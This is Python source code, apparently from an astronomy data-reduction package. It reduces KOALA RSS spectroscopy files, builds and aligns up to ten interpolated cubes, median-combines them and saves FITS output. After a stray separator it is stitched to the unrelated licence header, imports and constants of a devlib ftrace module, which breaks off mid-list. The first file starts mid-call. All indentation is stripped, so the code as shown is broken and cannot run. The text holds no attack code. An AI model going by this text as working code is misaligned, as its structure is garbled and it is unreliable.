correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[2],
sky_rss=sky_rss_list[2],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[2],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 3:
self.rss4 = KOALA_RSS(
rss_list[3],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[3],
apply_throughput=apply_throughput,
skyflat=skyflat_list[3],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[3],
sky_rss=sky_rss_list[3],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[3],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 4:
self.rss5 = KOALA_RSS(
rss_list[4],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[4],
apply_throughput=apply_throughput,
skyflat=skyflat_list[4],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[4],
sky_rss=sky_rss_list[4],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[4],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 5:
self.rss6 = KOALA_RSS(
rss_list[5],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[5],
apply_throughput=apply_throughput,
skyflat=skyflat_list[5],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[5],
sky_rss=sky_rss_list[5],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[5],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 6:
self.rss7 = KOALA_RSS(
rss_list[6],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[6],
apply_throughput=apply_throughput,
skyflat=skyflat_list[6],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[6],
sky_rss=sky_rss_list[6],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[6],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 7:
self.rss8 = KOALA_RSS(
rss_list[7],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[7],
apply_throughput=apply_throughput,
skyflat=skyflat_list[7],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[7],
sky_rss=sky_rss_list[7],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[7],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 8:
self.rss9 = KOALA_RSS(
rss_list[8],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[8],
apply_throughput=apply_throughput,
skyflat=skyflat_list[8],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[8],
sky_rss=sky_rss_list[8],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[8],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 9:
self.rss10 = KOALA_RSS(
rss_list[9],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[9],
apply_throughput=apply_throughput,
skyflat=skyflat_list[9],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[9],
sky_rss=sky_rss_list[9],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[9],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if (
np.nanmedian(flux_calibration) == 0
and np.nanmedian(flux_calibration_list[0]) == 0
):
print("\n 3. Cubing without considering any flux calibration ...")
fcal = False
else:
print("\n 3. Cubing applying flux calibration provided ...")
fcal = True
if np.nanmedian(flux_calibration) != 0:
for i in range(n_files):
flux_calibration_list[i] = flux_calibration
print(" Using same flux calibration for all object files")
else:
print(" List of flux calibrations provided !")
if offsets[0] != 1000:
print("\n Offsets values for alignment have been given, skipping cubing no-aligned rss...")
do_cubing = False
if do_cubing:
self.cube1 = Interpolated_cube(
self.rss1,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[0],
warnings=warnings,
)
if len(rss_list) > 1:
self.cube2 = Interpolated_cube(
self.rss2,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[1],
warnings=warnings,
)
if len(rss_list) > 2:
self.cube3 = Interpolated_cube(
self.rss3,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[2],
warnings=warnings,
)
if len(rss_list) > 3:
self.cube4 = Interpolated_cube(
self.rss4,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[3],
warnings=warnings,
)
if len(rss_list) > 4:
self.cube5 = Interpolated_cube(
self.rss5,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[4],
warnings=warnings,
)
if len(rss_list) > 5:
self.cube6 = Interpolated_cube(
self.rss6,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[5],
warnings=warnings,
)
if len(rss_list) > 6:
self.cube7 = Interpolated_cube(
self.rss7,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[6],
warnings=warnings,
)
if len(rss_list) > 7:
self.cube8 = Interpolated_cube(
self.rss8,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[7],
warnings=warnings,
)
if len(rss_list) > 8:
self.cube9 = Interpolated_cube(
self.rss9,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[8],
warnings=warnings,
)
if len(rss_list) > 9:
self.cube10 = Interpolated_cube(
self.rss10,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[9],
warnings=warnings,
)
if do_alignment:
if offsets[0] == 1000:
print("\n 4. Aligning individual cubes ...")
else:
print("\n 4. Checking given offsets data and perform cubing ...")
rss_list_to_align = [self.rss1, self.rss2]
if len(rss_list) > 2:
rss_list_to_align.append(self.rss3)
if len(rss_list) > 3:
rss_list_to_align.append(self.rss4)
if len(rss_list) > 4:
rss_list_to_align.append(self.rss5)
if len(rss_list) > 5:
rss_list_to_align.append(self.rss6)
if len(rss_list) > 6:
rss_list_to_align.append(self.rss7)
if len(rss_list) > 7:
rss_list_to_align.append(self.rss8)
if len(rss_list) > 8:
rss_list_to_align.append(self.rss9)
if len(rss_list) > 9:
rss_list_to_align.append(self.rss10)
if offsets[0] != 1000:
cube_list = []
else:
cube_list = [self.cube1, self.cube2]
if len(rss_list) > 2:
cube_list.append(self.cube3)
if len(rss_list) > 3:
cube_list.append(self.cube4)
if len(rss_list) > 4:
cube_list.append(self.cube5)
if len(rss_list) > 5:
cube_list.append(self.cube6)
if len(rss_list) > 6:
cube_list.append(self.cube7)
if len(rss_list) > 7:
cube_list.append(self.cube8)
if len(rss_list) > 8:
cube_list.append(self.cube9)
if len(rss_list) > 9:
cube_list.append(self.cube10)
cube_aligned_list = align_n_cubes(
rss_list_to_align,
cube_list=cube_list,
flux_calibration_list=flux_calibration_list,
pixel_size_arcsec=pixel_size_arcsec,
kernel_size_arcsec=kernel_size_arcsec,
plot=plot,
offsets=offsets,
ADR=ADR,
warnings=warnings,
)
self.cube1_aligned = cube_aligned_list[0]
self.cube2_aligned = cube_aligned_list[1]
if len(rss_list) > 2:
self.cube3_aligned = cube_aligned_list[2]
if len(rss_list) > 3:
self.cube4_aligned = cube_aligned_list[3]
if len(rss_list) > 4:
self.cube5_aligned = cube_aligned_list[4]
if len(rss_list) > 5:
self.cube6_aligned = cube_aligned_list[5]
if len(rss_list) > 6:
self.cube7_aligned = cube_aligned_list[6]
if len(rss_list) > 7:
self.cube8_aligned = cube_aligned_list[7]
if len(rss_list) > 8:
self.cube9_aligned = cube_aligned_list[8]
if len(rss_list) > 9:
self.cube10_aligned = cube_aligned_list[9]
if make_combined_cube:
print("\n 5. Making combined cube ...")
print("\n> Checking individual cubes: ")
print(" Cube RA_centre DEC_centre Pix Size Kernel Size")
print(" 1 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube1_aligned.RA_centre_deg,
self.cube1_aligned.DEC_centre_deg,
self.cube1_aligned.pixel_size_arcsec,
self.cube1_aligned.kernel_size_arcsec,
))
print(" 2 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube2_aligned.RA_centre_deg,
self.cube2_aligned.DEC_centre_deg,
self.cube2_aligned.pixel_size_arcsec,
self.cube2_aligned.kernel_size_arcsec,
))
if len(rss_list) > 2:
print(" 3 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube3_aligned.RA_centre_deg,
self.cube3_aligned.DEC_centre_deg,
self.cube3_aligned.pixel_size_arcsec,
self.cube3_aligned.kernel_size_arcsec,
))
if len(rss_list) > 3:
print(" 4 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube4_aligned.RA_centre_deg,
self.cube4_aligned.DEC_centre_deg,
self.cube4_aligned.pixel_size_arcsec,
self.cube4_aligned.kernel_size_arcsec,
))
if len(rss_list) > 4:
print(" 5 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube5_aligned.RA_centre_deg,
self.cube5_aligned.DEC_centre_deg,
self.cube5_aligned.pixel_size_arcsec,
self.cube5_aligned.kernel_size_arcsec,
))
if len(rss_list) > 5:
print(" 6 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube6_aligned.RA_centre_deg,
self.cube6_aligned.DEC_centre_deg,
self.cube6_aligned.pixel_size_arcsec,
self.cube6_aligned.kernel_size_arcsec,
))
if len(rss_list) > 6:
print(" 7 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube7_aligned.RA_centre_deg,
self.cube7_aligned.DEC_centre_deg,
self.cube7_aligned.pixel_size_arcsec,
self.cube7_aligned.kernel_size_arcsec,
))
if len(rss_list) > 7:
print(" 8 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube8_aligned.RA_centre_deg,
self.cube8_aligned.DEC_centre_deg,
self.cube8_aligned.pixel_size_arcsec,
self.cube8_aligned.kernel_size_arcsec,
))
if len(rss_list) > 8:
print(" 9 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube9_aligned.RA_centre_deg,
self.cube9_aligned.DEC_centre_deg,
self.cube9_aligned.pixel_size_arcsec,
self.cube9_aligned.kernel_size_arcsec,
))
if len(rss_list) > 9:
print(" 10 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube10_aligned.RA_centre_deg,
self.cube10_aligned.DEC_centre_deg,
self.cube10_aligned.pixel_size_arcsec,
self.cube10_aligned.kernel_size_arcsec,
))
#### THIS SHOULD BE A DEF within Interpolated_cube...
# Create a cube with zero
shape = [
self.cube1_aligned.data.shape[1],
self.cube1_aligned.data.shape[2],
]
self.combined_cube = Interpolated_cube(
self.rss1,
self.cube1_aligned.pixel_size_arcsec,
self.cube1_aligned.kernel_size_arcsec,
zeros=True,
shape=shape,
offsets_files=self.cube1_aligned.offsets_files,
)
if obj_name != "":
self.combined_cube.object = obj_name
if description == "":
self.combined_cube.description = (
self.combined_cube.object + " - COMBINED CUBE"
)
else:
self.combined_cube.description = description
print("\n> Combining cubes...")
if len(rss_list) == 2:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[self.cube1_aligned.data_ADR, self.cube2_aligned.data_ADR],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[self.cube1_aligned.data, self.cube2_aligned.data], axis=0
)
self.combined_cube.PA = np.mean(
[self.cube1_aligned.PA, self.cube2_aligned.PA]
)
if len(rss_list) == 3:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
]
)
if len(rss_list) == 4:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
]
)
if len(rss_list) == 5:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
]
)
if len(rss_list) == 6:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
self.cube6_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
self.cube6_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
self.cube6_aligned.PA,
]
)
if len(rss_list) == 7:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
self.cube6_aligned.data_ADR,
self.cube7_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
self.cube6_aligned.data,
self.cube7_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
self.cube6_aligned.PA,
self.cube7_aligned.PA,
]
)
if len(rss_list) == 8:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
self.cube6_aligned.data_ADR,
self.cube7_aligned.data_ADR,
self.cube8_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
self.cube6_aligned.data,
self.cube7_aligned.data,
self.cube8_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
self.cube6_aligned.PA,
self.cube7_aligned.PA,
self.cube8_aligned.PA,
]
)
if len(rss_list) == 9:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
self.cube6_aligned.data_ADR,
self.cube7_aligned.data_ADR,
self.cube8_aligned.data_ADR,
self.cube9_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
self.cube6_aligned.data,
self.cube7_aligned.data,
self.cube8_aligned.data,
self.cube9_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
self.cube6_aligned.PA,
self.cube7_aligned.PA,
self.cube8_aligned.PA,
self.cube9_aligned.PA,
]
)
if len(rss_list) == 10:
print (ADR)
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
self.cube6_aligned.data_ADR,
self.cube7_aligned.data_ADR,
self.cube8_aligned.data_ADR,
self.cube9_aligned.data_ADR,
self.cube10_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
self.cube6_aligned.data,
self.cube7_aligned.data,
self.cube8_aligned.data,
self.cube9_aligned.data,
self.cube10_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
self.cube6_aligned.PA,
self.cube7_aligned.PA,
self.cube8_aligned.PA,
self.cube9_aligned.PA,
self.cube10_aligned.PA,
]
)
# Include flux calibration, assuming it is the same to all cubes (need to be updated to combine data taken in different nights)
# if fcal:
if np.nanmedian(self.cube1_aligned.flux_calibration) == 0:
print(" Flux calibration not considered")
fcal = False
else:
self.combined_cube.flux_calibration = flux_calibration
print(" Flux calibration included!")
fcal = True
# # Check this when using files taken on different nights --> Data in self.combined_cube
# self.wavelength=self.rss1.wavelength
# self.valid_wave_min=self.rss1.valid_wave_min
# self.valid_wave_max=self.rss1.valid_wave_max
self.combined_cube.trace_peak(plot=plot)
self.combined_cube.get_integrated_map_and_plot(fcal=fcal, plot=plot)
self.combined_cube.total_exptime = self.rss1.exptime + self.rss2.exptime
if len(rss_list) > 2:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss3.exptime
)
if len(rss_list) > 3:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss4.exptime
)
if len(rss_list) > 4:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss5.exptime
)
if len(rss_list) > 5:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss6.exptime
)
if len(rss_list) > 6:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss7.exptime
)
if len(rss_list) > 7:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss8.exptime
)
if len(rss_list) > 8:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss9.exptime
)
if len(rss_list) > 9:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss10.exptime
)
print("\n Total exposition time = {} seconds adding the {} files".format(
self.combined_cube.total_exptime, len(rss_list)))
# Save it to a fits file
if save_aligned_cubes:
print("\n Saving aligned cubes to fits files ...")
for i in range(n_files):
if i < 9:
replace_text = "_{}_aligned_cube_0{}{}.fits".format(obj_name, i + 1, pk)
else:
replace_text = "_aligned_cube_{}{}.fits".format(i + 1, pk)
aligned_cube_name = rss_list[i].replace(".fits", replace_text)
if i == 0:
save_fits_file(self.cube1_aligned, aligned_cube_name, ADR=ADR)
if i == 1:
save_fits_file(self.cube2_aligned, aligned_cube_name, ADR=ADR)
if i == 2:
save_fits_file(self.cube3_aligned, aligned_cube_name, ADR=ADR)
if i == 3:
save_fits_file(self.cube4_aligned, aligned_cube_name, ADR=ADR)
if i == 4:
save_fits_file(self.cube5_aligned, aligned_cube_name, ADR=ADR)
if i == 5:
save_fits_file(self.cube6_aligned, aligned_cube_name, ADR=ADR)
if i == 6:
save_fits_file(self.cube7_aligned, aligned_cube_name, ADR=ADR)
if i == 7:
save_fits_file(self.cube8_aligned, aligned_cube_name, ADR=ADR)
if i == 8:
save_fits_file(self.cube9_aligned, aligned_cube_name, ADR=ADR)
if i == 9:
save_fits_file(self.cube10_aligned, aligned_cube_name, ADR=ADR)
if fits_file == "":
print("\n As requested, the combined cube will not be saved to a fits file")
else:
print("\n 6. Saving combined cube to a fits file ...")
check_if_path = fits_file.replace("path:", "")
if len(fits_file) != len(check_if_path):
fits_file = ("{}{}_{}{}_combining_{}_cubes.fits".format(
check_if_path, obj_name, self.combined_cube.grating, pk, n_files)
)
save_fits_file(self.combined_cube, fits_file, ADR=ADR)
print("\n================== REDUCING KOALA DATA COMPLETED ====================\n\n")
|
<filename>devlib/trace/ftrace.py
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import division
import os
import time
import subprocess
from devlib.trace import TraceCollector
from devlib.host import PACKAGE_BIN_DIRECTORY
from devlib.exception import TargetError, HostError
from devlib.utils.misc import check_output, which
TRACE_MARKER_START = 'TRACE_MARKER_START'
TRACE_MARKER_STOP = 'TRACE_MARKER_STOP'
OUTPUT_TRACE_FILE = 'trace.dat'
DEFAULT_EVENTS = [
'cpu_frequency',
'cpu_idle',
